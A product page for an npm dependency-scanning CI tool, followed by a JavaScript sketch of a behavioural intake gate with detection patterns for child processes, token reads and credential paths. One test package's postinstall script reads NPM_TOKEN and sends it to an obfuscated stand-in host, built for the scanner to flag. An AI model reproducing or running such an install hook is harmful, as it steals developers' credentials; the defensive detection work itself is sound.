Behavioral Supply Chain Intelligence
See what every dependency actually does before it ships
Get visibility into dependency behavior in your CI pipeline. Every package change gets a risk score and behavioral report — flag suspicious packages for review, auto-approve the rest. Configurable thresholds, allowlists, and a full audit trail for compliance.
No credit card required. Free forever.
Why You Need an Intake Gate
In 2025, these unreviewed dependency updates hit production. None carried a CVE at the time they merged, no intake process caught them, and every one went through a standard PR workflow.
- chalk + debug hijack: 2.6B weekly downloads compromised
- Shai-Hulud worm: 500+ packages infected in 24 hours
- S1ngularity campaign: 2,349 credentials stolen via install scripts
- tj-actions breach: 23K repos exposed; the attack initially targeted Coinbase
Without intake control
- Dependencies merge unreviewed
- CVE-based scanners only flag known vulnerabilities; a freshly published malicious version has no advisory to match
- No policy enforcement on upgrades
- No audit trail for compliance
With Dependency Guardian
- Every upgrade gets a verdict before merge
- Behavioral analysis catches new attacks
- Configurable pass/warn/block thresholds
- Full scan history and audit trail
Policy enforcement
Set thresholds, allowlist trusted packages, choose warn vs. block per repository. Your governance rules, automated.
Approval workflow
Every lockfile change gets a verdict posted as a PR comment. Review flagged packages before they merge.
5-minute CI setup
One YAML file or npm i -g @westbayberry/dg. Works with GitHub Actions, GitLab CI, Jenkins, and more.
Compliance-ready audit trail
Every scan logged with verdicts, risk scores, and findings. Built for teams that need to prove what was reviewed.
Detection accuracy validated against 11,000+ real packages (99.95% precision, 99.7% F1). See benchmarks.
How it works
From dependency change to approved merge in four steps.
Step 01, Pull Request: a developer opens a PR that adds or updates npm packages in your lockfile (package-lock.json).
Step 02, Scan for Attacks: 26 behavioral detectors analyze every file in each changed package for malicious code patterns.
Step 03, Pass / Warn / Block: a risk score determines the verdict, either safe to merge, review needed, or blocked outright.
Step 04, Ship Safe: merge knowing every dependency change was analyzed before it reached main.
GitHub Actions
    PR #247 bump lodash 4.17.20 → 4.17.21
    → Scanning 3 changed packages...
    → Running 26 detectors across 847 files
    → PASS — safe to merge
CLI
    $ dg scan
    Discovering package changes...
    Scanning 3 packages (git-diff)...
    Dependency Guardian Score: 0 PASS
    3 packages scanned, 0 flagged
In your pull request
Every dependency change gets a verdict posted directly in the PR, shown as Clean, Flagged (warn), or Flagged (block). Review, approve, or block before merge.
Ship with confidence. Every dependency upgrade is reviewed, scored, and logged before it reaches main.
Built for dependency governance
Six capabilities that turn dependency updates into a controlled process.
CI enforcement on every PR
Runs automatically when package-lock.json changes. One YAML file. Every dependency upgrade goes through your intake gate before it can merge.
Configurable policy engine
Set risk thresholds per repository. Allowlist trusted packages. Choose between warn and block modes. Your governance rules, enforced automatically.
Pass / Warn / Block verdicts
Every PR gets a risk score and a clear verdict. Block mode prevents merging. Warn mode flags for human review. Your team stays in control.
Audit trail and scan history
Every scan is logged with verdicts, risk scores, and findings. Track who approved what, when. Built for compliance reviews and security audits.
Behavioral analysis engine
26 detectors analyze what packages actually do — install scripts, network calls, credential access, obfuscation. Catches zero-day attacks that CVE databases miss.
Your source code stays private
Only npm packages are scanned. Your application code is never uploaded. Self-hosted option available for enterprise environments.
What powers the verdicts
26 behavioral detectors analyze what packages actually do — the engine behind every pass, warn, and block decision.
Install Scripts, Child Process, Network Exfiltration, Obfuscation, Diff Risk, Fresh Publish, Maintainer Change, Sensitive Paths, Binary Addons, Filesystem Persistence, CI Secret Access, Suspicious API, GitHub Reputation, Source Mismatch, Purpose Mismatch, Typosquat, Root Scripts, Behavior Drift, Token Theft, Worm Behavior, Preinstall Timing, Legitimate API Exfil, Bun Runtime Evasion, Dependency Confusion, Browser Phishing, Empty Package.
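The scan, score and pass/warn/block flow from the four steps above, reduced to a runnable sketch. This is an added example, not Dependency Guardian's engine and not any of its 26 detectors: it implements five simplified detectors (install scripts, child process, network, credential access, obfuscation) as pattern checks over a package's manifest and files, sums their weights into a risk score, applies warn and block thresholds plus a name@version allowlist, and runs over three constructed packages (tiny-pad, node-gyp-addon, colorz) embedded inline. The detector weights, thresholds, allowlist entry, sample package contents and function names are all assumptions made for the demo.

```javascript
// Added example: a miniature behavioural intake gate. Not Dependency Guardian's
// code; detector set, weights, thresholds and sample packages are assumptions.
"use strict";

// Search every file of a package for a pattern; return a short finding or null.
function searchFiles(pkg, re, label) {
  for (const [path, text] of Object.entries(pkg.files)) {
    const m = re.exec(text);
    if (m) return `${label} in ${path}: ${m[0].slice(0, 40)}`;
  }
  return null;
}

// Each detector asks "does this package exhibit the behaviour?" and carries a
// weight that feeds the risk score. A real engine has far more signals.
const DETECTORS = [
  { name: "install-scripts", weight: 30, run: (pkg) => {
      const hooks = ["preinstall", "install", "postinstall"]
        .filter((h) => pkg.manifest.scripts && h in pkg.manifest.scripts);
      return hooks.length ? `lifecycle hooks: ${hooks.join(", ")}` : null;
  } },
  { name: "child-process", weight: 20, run: (pkg) =>
      searchFiles(pkg, /require\(["']child_process["']\)|\b(exec|execSync|spawn|spawnSync)\(/, "process spawn") },
  { name: "network", weight: 20, run: (pkg) =>
      searchFiles(pkg, /\b(https?|net|dns)\.(request|get|connect|resolve)\(|\bfetch\(/, "outbound network call") },
  { name: "credential-access", weight: 25, run: (pkg) =>
      searchFiles(pkg, /process\.env\.(NPM_TOKEN|GITHUB_TOKEN|AWS_[A-Z_]+)|\.npmrc|\.ssh\/|\.aws\/credentials/, "secret access") },
  { name: "obfuscation", weight: 15, run: (pkg) =>
      searchFiles(pkg, /\beval\(|new Function\(|(\\x[0-9a-f]{2}){8,}/i, "obfuscated code") },
];

// Policy (assumed values). The allowlist is pinned to name@version so a later,
// different publish of a trusted package is still scanned in full.
const POLICY = { warnAt: 40, blockAt: 70, allowlist: new Set(["node-gyp-addon@1.2.0"]) };

function scanPackage(pkg, policy = POLICY) {
  const id = `${pkg.manifest.name}@${pkg.manifest.version}`;
  const findings = [];
  let score = 0;
  for (const d of DETECTORS) {
    const hit = d.run(pkg);
    if (hit) { findings.push({ detector: d.name, detail: hit, weight: d.weight }); score += d.weight; }
  }
  let verdict = score >= policy.blockAt ? "BLOCK" : score >= policy.warnAt ? "WARN" : "PASS";
  if (policy.allowlist.has(id) && verdict !== "PASS") {
    // Allowlisting overrides the verdict but keeps the findings for the audit trail.
    findings.push({ detector: "policy", detail: "allowlisted by reviewer", weight: 0 });
    verdict = "PASS";
  }
  return { id, score, verdict, findings };
}

// The PR-level verdict is the worst per-package verdict.
function gate(packages, policy = POLICY) {
  const results = packages.map((p) => scanPackage(p, policy));
  const rank = { PASS: 0, WARN: 1, BLOCK: 2 };
  const verdict = results.reduce((worst, r) => (rank[r.verdict] > rank[worst] ? r.verdict : worst), "PASS");
  return { verdict, results };
}

// Constructed sample packages standing in for the changed entries in a lockfile.
const SAMPLES = [
  { manifest: { name: "tiny-pad", version: "1.0.0" },
    files: { "index.js": "module.exports = (s, n) => String(s).padStart(n, ' ');" } },
  { manifest: { name: "node-gyp-addon", version: "1.2.0", scripts: { install: "node-gyp rebuild" } },
    files: { "index.js": "const { spawnSync } = require('child_process');\nmodule.exports = () => spawnSync('ls');" } },
  { manifest: { name: "colorz", version: "4.17.22", scripts: { postinstall: "node setup.js" } },
    files: {
      "index.js": "module.exports = (s) => '\\x1b[31m' + s;",
      "setup.js": [
        "const { execSync } = require('child_process');",
        "const https = require('https');",
        "const t = process.env.NPM_TOKEN;",
        "const h = '\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x65\\x76\\x69\\x6c';",
        "https.request({ host: eval(h), path: '/?t=' + t }).end();",
      ].join("\n"),
    } },
];

const out = gate(SAMPLES);
for (const r of out.results) {
  console.log(r.verdict.padEnd(5), r.id, `score=${r.score}`, r.findings.map((f) => f.detector).join(","));
}
console.log("gate:", out.verdict); // in CI, exit non-zero here when the gate verdict is BLOCK
```

Running it prints PASS for tiny-pad (score 0), PASS for node-gyp-addon (score 50, WARN downgraded by the version-pinned allowlist entry) and BLOCK for colorz (score 110: lifecycle hook, child process, outbound request, NPM_TOKEN read and a hex-escaped string), so the gate verdict is BLOCK. Two caveats a reviewer should keep in mind: single regex hits are weak evidence on their own, which is why the score combines several behaviours before crossing the warn or block line, and an allowlist that matched on name alone would wave through exactly the maintainer-change and behavior-drift cases the detector list above exists to catch.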
Works everywhere you build
GitHub Actions, GitLab CI, Jenkins, Bitbucket, CircleCI, or your terminal.